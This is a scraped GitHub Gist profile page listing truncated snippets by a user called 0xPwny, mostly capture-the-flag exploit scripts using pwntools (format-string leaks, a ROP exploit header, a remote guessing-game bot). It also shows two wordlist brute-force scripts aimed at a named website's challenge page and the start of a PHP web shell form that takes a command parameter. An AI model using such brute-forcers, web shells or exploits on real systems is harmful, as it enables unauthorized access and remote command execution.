Skip to content

Instantly share code, notes, and snippets.

View 0xPwny's full-sized avatar

Abdeljalil Nouiri 0xPwny

  • Segfault the world
  • Morocco
View GitHub Profile
@0xPwny
0xPwny / test.py
Created February 7, 2016 09:29
test
#!/usr/bin/python
print "hello Madafuckerz"
@0xPwny
0xPwny / FDbruter.py
Last active February 16, 2016 12:51
#!/usr/bin/python
import requests
import re
wordlist = open("/home/crypthon/Downloads/list.txt","rb").readlines() #http://pastebin.com/SjjiH2ua
for x in wordlist:
p = x.replace('\n','')
m = p.replace("\r","")
@0xPwny
0xPwny / Passb.py
Last active February 16, 2016 12:51
#!/usr/bin/python
import requests
url = "http://www.orlando-ticket-deals.co.uk/forums/challenge/"
cd = open('/home/crypthon/Downloads/bbc6AzUK.txt').readlines() #http://pastebin.com/bbc6AzUK
for xi in cd:
p = xi.replace('\n','')
o = p.replace('\r','')
#/usr/bin/python
#Abdeljalil Nouiri
#Crypthon ^^
import time
import binascii
@0xPwny
0xPwny / resh.php
Created March 20, 2016 03:06
small shell
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Remote Control</title>
<link rel="stylesheet" href="">
</head>
<body>
<form method="GET" action="index.php">
<input type="text" name="cmd" placeholder="Enter your command here ">
@0xPwny
0xPwny / guessingame.py
Created April 18, 2016 15:55
PACTF2016 - Guessing GAME
#!/usr/bin/python
from pwn import *
import random
while True:
co = remote('104.236.216.251',64753)
print co.recv()
co.send('abdel\n')
#!/usr/bin/python
#Guess | format string | leaking
#Abdeljalil Nouiri "crypth0n"
#PicoCTF GUESS
from pwn import *
import time
import re
@0xPwny
0xPwny / format2.py
Created December 8, 2016 00:21
Format string 2 - protostar
#!/usr/bin/python
from pwn import *
########STAGE1 GET OFFSET
"""
cnx = remote("172.16.20.132",2020)
trash = "AAAA"+"-%x"*200
cnx.send(trash+"\n")
@0xPwny
0xPwny / 4PPSTR-exploit.py
Created December 9, 2016 22:36
MCSC16 CTF - 4PPSTR Pwnable Exploit / Abdeljalil Nouiri
#!/usr/bin/python
#Abdeljalil Nouiri
#4PPSTR - Pwnable - MCSC2016 CTF
#Greetz : Azzedine Djekmani & All MCSC CTF organizers & INSEC
#!/usr/bin/python
#ROPASAURUSREX - EXPLOIT
#ABDELJALIL NOUIRI
from time import *
import sys
from pwn import *